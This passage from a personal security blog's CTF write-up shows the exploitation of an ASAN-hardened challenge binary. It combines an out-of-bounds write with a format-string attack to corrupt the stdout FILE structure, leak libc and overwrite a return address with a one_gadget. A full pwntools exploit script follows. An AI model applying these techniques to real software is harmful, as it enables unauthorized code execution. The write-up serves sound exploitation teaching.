<h2 id="exploitation"><a class="header-anchor" href="#exploitation">¶</a>Exploitation</h2>
<p>The binary has turned on all mitigation, so the first thing we want to do is leaking some address.</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">matthew@matthew-Virtual-Machine</span> <span class="string">&gt; checksec ./VulnTest</span></span><br><span class="line"><span class="string">[*] './VulnTest'</span></span><br><span class="line"><span class="string"></span><span class="attr">    Arch:</span>     <span class="string">amd64-64-little</span></span><br><span class="line"><span class="attr">    RELRO:</span>    <span class="string">Full</span> <span class="string">RELRO</span></span><br><span class="line"><span class="attr">    Stack:</span>    <span class="string">Canary</span> <span class="string">found</span></span><br><span class="line"><span class="attr">    NX:</span>       <span class="string">NX</span> <span class="string">enabled</span></span><br><span class="line"><span class="attr">    PIE:</span>      <span class="string">PIE</span> <span class="string">enabled</span></span><br><span class="line"><span class="attr">    ASAN:</span>     <span class="string">Enabled</span></span><br></pre></td></tr></table></figure>
<p>We have a format string vuln and an out-of-bound(OOB) vuln, it is natual to consider combine them together. With the OOB, we can overwrite the bad character set on the stack, then we can bypass the bad character check. And we can also write the format string to <code>buf_test1</code> with the out-of-bound vuln, then we can ignore the constrain of the max length of 7 bytes.</p>
<p>But the question is, even we can prepare the format string and let <code>sprintf</code> process it, we could not get its output because of the <code>strcmp</code> check.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( a1[<span class="number">16</span>] )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">strcmp</span>(a1 + <span class="number">16</span>, a1) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"You can't test dangerous characters"</span>);</span><br><span class="line">    __asan_handle_no_return();</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Your data:"</span>);</span><br><span class="line">  result = <span class="built_in">puts</span>(a1 + <span class="number">16</span>);</span><br></pre></td></tr></table></figure>
<p>Then I check the stack again in the <code>write_card</code> of <code>test2</code> to see what can we do with the OOB capability. I marked the bufffer as well as the red zone, remember that what we can control is <code>buf_test2</code> itself and the content above. As we mentioned, we can fully control <code>buf_test1</code> and utilize the format string vuln, but we could not leak data from that. We can see the return address also can be controlled. I tried to partial over write the return address to somewhere else and skip the <code>TEST2_DONE</code> setting, it works and we can do aribitrary times of <code>Test2</code>.</p>
<p>However, our primrary task is leaking address. I also try to write 0x30 of <code>A</code> to <code>buf_test2</code> and leaking the address in the red zone. But once the program reads or writes the red zone buffer, it dies.</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00</span>:<span class="number">0000</span>│ <span class="built_in">rbp</span>          <span class="number">0x7ffe86bf69f0</span> —▸ <span class="number">0x7ffe86bf6bc0</span> —▸ <span class="number">0x560bf17f5ea0</span> ◂— <span class="keyword">push</span>   <span class="built_in">r15</span></span><br><span class="line"><span class="number">01</span>:<span class="number">0008</span>│ [<span class="keyword">RET</span> ADDR]   <span class="number">0x7ffe86bf69f8</span> —▸ <span class="number">0x560bf17f4265</span> ◂— <span class="keyword">jmp</span>    <span class="number">0x560bf17f4291</span></span><br><span class="line"><span class="number">02</span>:<span class="number">0010</span>│              <span class="number">0x7ffe86bf6a00</span> ◂— <span class="number">0x6</span></span><br><span class="line"><span class="number">03</span>:<span class="number">0018</span>│ [IO_STDOUT]  <span class="number">0x7ffe86bf6a08</span> —▸ <span class="number">0x7f71852cd760</span> (_IO_2_1_stdout_) —▸ <span class="number">0xfbad3c83</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">04</span>:<span class="number">0020</span>│              <span class="number">0x7ffe86bf6a10</span> ◂— <span class="number">0x41b58ab3</span></span><br><span class="line"><span class="number">05</span>:<span class="number">0028</span>│              <span class="number">0x7ffe86bf6a18</span> —▸ <span class="number">0x560bf17f9420</span> ◂— <span class="keyword">xor</span>    <span class="built_in">esp</span>, <span class="built_in">dword</span> <span class="built_in">ptr</span> [<span class="built_in">rax</span>]</span><br><span class="line"><span class="number">06</span>:<span class="number">0030</span>│              <span class="number">0x7ffe86bf6a20</span> —▸ <span class="number">0x560bf17f3fec</span> ◂— <span class="keyword">push</span>   <span class="built_in">rbp</span></span><br><span class="line"><span class="number">07</span>:<span class="number">0038</span>+              <span class="number">0x7ffe86bf6a28</span> ◂— <span class="number">0x35680b6aed009f00</span></span><br><span class="line"><span class="number">08</span>:<span class="number">0040</span>+ ------------+<span class="number">0x7ffe86bf6a30</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓      buf_test1</span><br><span class="line">0c:<span class="number">0060</span>│              <span class="number">0x7ffe86bf6a50</span> ◂— <span class="string">'$dufscnpexXog'</span></span><br><span class="line"><span class="number">0d</span>:<span class="number">0068</span>│ +-----------+<span class="number">0x7ffe86bf6a58</span> —▸ <span class="number">0x676f587865</span> ◂— <span class="number">0x0</span></span><br><span class="line">0e:<span class="number">0070</span>│   RED ZONE   <span class="number">0x7ffe86bf6a60</span> —▸ <span class="number">0x7f71856529a8</span> ◂— <span class="number">0x8</span></span><br><span class="line">0f:<span class="number">0078</span>│              <span class="number">0x7ffe86bf6a68</span> —▸ <span class="number">0x7f7185363456</span> (__dynamic_cast+<span class="number">118</span>) ◂— <span class="keyword">mov</span>    <span class="built_in">rdx</span>, <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rsp</span> + <span class="number">0x10</span>]</span><br><span class="line"><span class="number">10</span>:<span class="number">0080</span>│              <span class="number">0x7ffe86bf6a70</span> —▸ <span class="number">0x7f71856589c0</span> —▸ <span class="number">0x7f7185653810</span> —▸ <span class="number">0x7f71853f98a0</span> ◂— ...</span><br><span class="line"><span class="number">11</span>:<span class="number">0088</span>│              <span class="number">0x7ffe86bf6a78</span> —▸ <span class="number">0x7ffe86bf6a80</span> —▸ <span class="number">0x7f71856589c0</span> —▸ <span class="number">0x7f7185653810</span> ◂— ...</span><br><span class="line"><span class="number">12</span>:<span class="number">0090</span>│              <span class="number">0x7ffe86bf6a80</span> —▸ <span class="number">0x7f71856589c0</span> —▸ <span class="number">0x7f7185653810</span> —▸ <span class="number">0x7f71853f98a0</span> ◂— ...</span><br><span class="line"><span class="number">13</span>:<span class="number">0098</span>│              <span class="number">0x7ffe86bf6a88</span> ◂— <span class="number">0x6</span></span><br><span class="line"><span class="number">14</span>:00a0│ <span class="built_in">rdx</span>+--------+<span class="number">0x7ffe86bf6a90</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓      buf_test2</span><br><span class="line">1a:00d0│ +-----------+<span class="number">0x7ffe86bf6ac0</span> —▸ <span class="number">0x7f7185659924</span> ◂— <span class="number">0x2</span></span><br><span class="line"><span class="number">1b</span>:00d8│   RED ZONE   <span class="number">0x7ffe86bf6ac8</span> —▸ <span class="number">0x7f71853fd05b</span> ◂— <span class="keyword">test</span>   <span class="built_in">rax</span>, <span class="built_in">rax</span></span><br><span class="line">1c:00e0│              <span class="number">0x7ffe86bf6ad0</span> —▸ <span class="number">0x7f7185657878</span> (<span class="keyword">std</span>::wclog+<span class="number">216</span>) —▸ <span class="number">0x7f71856596a0</span> ◂— <span class="number">0x10</span></span><br><span class="line"><span class="number">1d</span>:00e8│              <span class="number">0x7ffe86bf6ad8</span> —▸ <span class="number">0x7f71853cb4e6</span> ◂— <span class="keyword">mov</span>    <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rbp</span> + <span class="number">0x100</span>], <span class="built_in">rax</span></span><br><span class="line">1e:00f0│              <span class="number">0x7ffe86bf6ae0</span> —▸ <span class="number">0x7f71856579e8</span> (<span class="keyword">std</span>::wcout+<span class="number">8</span>) —▸ <span class="number">0x7f71856529e8</span> —▸ <span class="number">0x7f71853e4b30</span> ◂— ...</span><br><span class="line">1f:00f8│ ------------+<span class="number">0x7ffe86bf6ae8</span> —▸ <span class="number">0x7f71852d1628</span> (__exit_funcs_lock) ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">20</span>:<span class="number">0100</span>│   buf_test3  <span class="number">0x7ffe86bf6af0</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓</span><br><span class="line"><span class="number">30</span>:<span class="number">0180</span>│              <span class="number">0x7ffe86bf6b70</span> —▸ <span class="number">0x7ffe86bf6b80</span> ◂— <span class="number">0x4</span></span><br></pre></td></tr></table></figure>
<p>Notice that there is a pointer to <code>_IO_2_1_stdout</code> on the stack. That reminds me the the file struct technique introduced by angelboy: <a href="https://gsec.hitb.org/materials/sg2018/WHITEPAPERS/FILE%20Structures%20-%20Another%20Binary%20Exploitation%20Technique%20-%20An-Jie%20Yang.pdf" target="_blank" rel="noopener">Play with FILE Structure - Yet Another Binary Exploitation Technique</a>. We can overwrite <code>_IO_2_1_stdout_-&gt;_IO_write_base</code> to leak some addresses. So the idea becomes clear, we can overwrite the lowest byte of <code>_IO_2_1_stdout_</code> with OOB, from <code>0x60</code> to <code>0x80</code>, then it will point to <code>_IO_write_base</code>. And we can use the format string with <code>%n</code> character to overwrite the lowest byte of <code>_IO_write_base</code> to <code>\x00</code>, and it will leak some libc address when next time <code>puts</code> is called.<br>
How to bypass the <code>strcmp</code> check? I found that the format string <code>%10$hhn%6$s</code> could do the job and pass the check.</p>
<p>With the libc address, we can use Test2 OOB one more time to write its return address to one_gadget. And lucky for us, <code>rsp + 0x40</code> locates in <code>buf_test2</code>, so it can be easily set to null.</p>
<h2 id="exp-py"><a class="header-anchor" href="#exp-py">¶</a><a href="http://exp.py" target="_blank" rel="noopener">exp.py</a></h2>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">chose</span><span class="params">(n)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"command&gt;&gt; "</span>, str(n))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test1</span><span class="params">()</span>:</span></span><br><span class="line">    chose(<span class="string">"1"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_str</span><span class="params">(ss)</span>:</span></span><br><span class="line">    chose(<span class="string">"1"</span>)</span><br><span class="line">    p.sendafter(<span class="string">"Input your test string:"</span>, ss)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show_str</span><span class="params">()</span>:</span></span><br><span class="line">    chose(<span class="string">"2"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">back</span><span class="params">()</span>:</span></span><br><span class="line">    chose(<span class="string">"3"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test2</span><span class="params">()</span>:</span></span><br><span class="line">    chose(<span class="string">"2"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_arr</span><span class="params">(idx, ss)</span>:</span></span><br><span class="line">    chose(<span class="string">"1"</span>)</span><br><span class="line">    p.sendafter(<span class="string">"So,tell me where you want to start(0~47):"</span>, (str(idx)+<span class="string">"\n"</span>)[:])</span><br><span class="line">    p.sendafter(<span class="string">"There is a stack overflow!"</span>, ss)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show_arr</span><span class="params">()</span>:</span></span><br><span class="line">    chose(<span class="string">"2"</span>)</span><br><span class="line"></span><br><span class="line">test2()</span><br><span class="line">write_arr(<span class="string">"0"</span>, <span class="string">"B"</span>*<span class="number">0x30</span> + <span class="string">"\x00"</span>) <span class="comment"># fill buf_test2</span></span><br><span class="line">write_arr(<span class="string">"-64"</span>, cyclic(<span class="number">12</span>)+<span class="string">"\n"</span>) <span class="comment"># overwrite bad char set</span></span><br><span class="line">write_arr(<span class="string">"-96"</span>, <span class="string">"%10$hhn%6$s"</span>+ <span class="string">"\n"</span>) <span class="comment"># format string</span></span><br><span class="line">write_arr(<span class="string">"-136"</span>, <span class="string">"\x80\x00"</span>) <span class="comment"># overwrite _IO_2_1_stdout_ to _IO_2_1_stdout_-&gt;_IO_write_base</span></span><br><span class="line">write_arr(<span class="string">"-152"</span>, <span class="string">"\x9e\x00"</span>) <span class="comment"># overwrite return address to skip setting TEST2_DONE.</span></span><br><span class="line">test1()</span><br><span class="line">show_str()</span><br><span class="line"><span class="comment"># leak data</span></span><br><span class="line">ru(<span class="string">"string!\n"</span>)</span><br><span class="line">content = ru(<span class="string">"Your data"</span>)</span><br><span class="line">leak_libc = uu64(content[<span class="number">8</span>:<span class="number">16</span>])</span><br><span class="line">info_addr(<span class="string">"leak_libc"</span>, leak_libc)</span><br><span class="line">libc = leak_libc -  <span class="number">0x3ed8b0</span></span><br><span class="line">info_addr(<span class="string">"libc"</span>, libc)</span><br><span class="line">gdb.attach(p, gdbcmd)</span><br><span class="line">back()</span><br><span class="line">test2()</span><br><span class="line">one = libc + <span class="number">0x4f2c5</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">3</span>):</span><br><span class="line">    write_arr(str(<span class="number">-88</span>+i), <span class="string">"\n"</span>) <span class="comment"># prepare [rsp + 0x40] == 0</span></span><br><span class="line"></span><br><span class="line">write_arr(<span class="string">"-152"</span>, p64(one)[:<span class="number">-1</span>]) <span class="comment"># write one_gadget to return address</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="wrapup"><a class="header-anchor" href="#wrapup">¶</a>Wrapup</h2>
<p>This challenge contains more function logic than normal one, and the ASAN compile option takes me more time on reversing. I’m sure that there are other solutions could reach the goal. I remember that at final, because this is a real-world style challenge, teams need to show their solution on stage, some teams need to perform some guessing to get the shell.</p>
<p>The binary itself is heavily protected by sundry checks, there are some checks about verifying if the address outside forbidden range before writing to it. Frankly, I didn’t look into <code>Test3</code> closely and consider how to bypass these checks. Because I know that the primary task is getting some leaks, without known address, we could not bypass the ASAN checks in <code>Test3</code> anyway.</p>
<p>During the search of a workable memory leakage, I came up with this solution. The lesson is we should clear about what capability we’ve got, in this case OOB and format string. We can make a roadmap and ignore all the seemly scary irrelevant mitigations, then solve the checkpoints one by one.</p>
<h2 id="references"><a class="header-anchor" href="#references">¶</a>References</h2>
<ol>
<li><a href="https://github.com/google/sanitizers/wiki/AddressSanitizerAlgorithm" target="_blank" rel="noopener">https://github.com/google/sanitizers/wiki/AddressSanitizerAlgorithm</a></li>
<li><a href="https://gsec.hitb.org/materials/sg2018/WHITEPAPERS/FILE%20Structures%20-%20Another%20Binary%20Exploitation%20Technique%20-%20An-Jie%20Yang.pdf" target="_blank" rel="noopener">https://gsec.hitb.org/materials/sg2018/WHITEPAPERS/FILE Structures - Another Binary Exploitation Technique - An-Jie Yang.pdf</a></li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/12/31/Booklist2019/" rel="next" title="Booklist2019">
                <i class="fa fa-chevron-left"></i> Booklist2019
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/02/21/v8-exploit/" rel="prev" title="V8 Exploit">
                V8 Exploit <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Matthew Shao">
          <p class="site-author-name" itemprop="name">Matthew Shao</p>
          <p class="site-description motion-element" itemprop="description">👋🤷🔄🌐🔄🔄🤼🔄🔄🐚😭🤼🤼🔄🌐🤼😭🌐🤼🌐🔄🌐🤼🤼🤼</p>
        </div>
        <nav class="site-state motion-element">
        
          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">57</span>
                <span class="site-state-item-name">文章</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分類</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">標籤</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/MatthewShao" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#recon"><span class="nav-number">1.</span> <span class="nav-text">¶Recon</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#test1"><span class="nav-number">1.1.</span> <span class="nav-text">¶Test1</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#write-card"><span class="nav-number">1.1.1.</span> <span class="nav-text">¶Write Card</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#show-card"><span class="nav-number">1.1.2.</span> <span class="nav-text">¶Show Card</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#test2"><span class="nav-number">1.2.</span> <span class="nav-text">¶Test2</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#write-card-v2"><span class="nav-number">1.2.1.</span> <span class="nav-text">¶Write Card</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#read-card"><span class="nav-number">1.2.2.</span> <span class="nav-text">¶Read Card</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#test3"><span class="nav-number">1.3.</span> <span class="nav-text">¶Test3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#main"><span class="nav-number">1.4.</span> <span class="nav-text">¶Main</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exploitation"><span class="nav-number">2.</span> <span class="nav-text">¶Exploitation</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp-py"><span class="nav-number">3.</span> <span class="nav-text">¶exp.py</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#wrapup"><span class="nav-number">4.</span> <span class="nav-text">¶Wrapup</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#references"><span class="nav-number">5.</span> <span class="nav-text">¶References</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Matthew Shao</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 強力驅動
</div>

<div class="theme-info">
  主題 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Logos
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/schemes/logos.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  

  




  
  

  

  

  

  


</body>
</html>
